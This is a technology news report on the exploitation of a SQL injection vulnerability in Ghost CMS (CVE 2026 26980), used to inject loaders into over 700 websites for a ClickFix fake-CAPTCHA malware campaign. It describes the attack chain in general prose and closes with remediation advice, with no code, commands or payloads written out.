A recently disclosed critical vulnerability in Ghost CMS is being actively exploited by threat actors to compromise websites and deploy malicious code as part of a large scale ClickFix attack campaign, according to cybersecurity researchers at QiAnXin XLab. The security issue, tracked as CVE 2026 26980, carries a CVSS severity score of 9.4 and affects Ghost’s Content API through a SQL injection flaw that can allow unauthenticated attackers to access arbitrary information from databases. Researchers reported that attackers have already compromised more than 700 websites across sectors including universities, blockchain, artificial intelligence, software as a service, cybersecurity research, media, and financial technology. The vulnerability was patched in February 2026 through Ghost version 6.19.1, while the flaw itself was reportedly discovered by Anthropic through its Claude artificial intelligence platform.
According to findings shared by QiAnXin XLab, attackers are exploiting the vulnerability to gain unauthorized access to a website’s Admin API Key, which allows direct modification of content managed through Ghost CMS. Threat actors reportedly used this access to inject malicious JavaScript code into articles at scale, placing hidden loaders at the bottom of web pages to support fake CAPTCHA based attacks. Researchers described the operation as a large scale poisoning campaign, with at least two threat clusters believed to be involved in exploiting vulnerable systems. In some cases, websites were reportedly compromised and modified within a single day. XLab stated that the campaign was first identified on May 7, 2026, and warned that the use of legitimate websites significantly increases the credibility of malicious content, making visitors more likely to trust deceptive prompts.
The malicious JavaScript injected into compromised sites reportedly functions as a two stage loader that retrieves additional payloads during runtime from an external domain. Researchers explained that the attackers used a cloaking infrastructure designed to selectively deliver harmful payloads only to intended victims while presenting harmless pages to automated security scanners and web crawlers. The external script reportedly collects browser fingerprinting data and determines whether users should receive redirects, downloads, or malicious prompts. Intended targets are ultimately shown fake CAPTCHA verification pages through embedded iframe elements that instruct victims to manually copy and paste a Base64 encoded command into the Windows Run dialog, initiating a ClickFix infection chain. This process reportedly downloads malicious archives containing scripts that trigger PowerShell commands, fetch remote files, and execute payloads using rundll32.exe while simultaneously displaying misleading web pages to distract users.
Researchers noted that later versions of the malware shifted from delivering malicious DLL files to JavaScript payloads, though the final objective remained the installation of a Windows executable capable of persistence and remote communication with attacker controlled infrastructure. One observed payload reportedly involved a modified version of the open source Grape desktop client, designed to contact remote servers every 30 seconds and execute attacker issued commands. Security experts have advised Ghost CMS users to immediately upgrade to the latest software version, rotate credentials, inspect websites for unauthorized modifications, review access logs for suspicious activity, and notify users who may have visited affected websites during the period of compromise.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
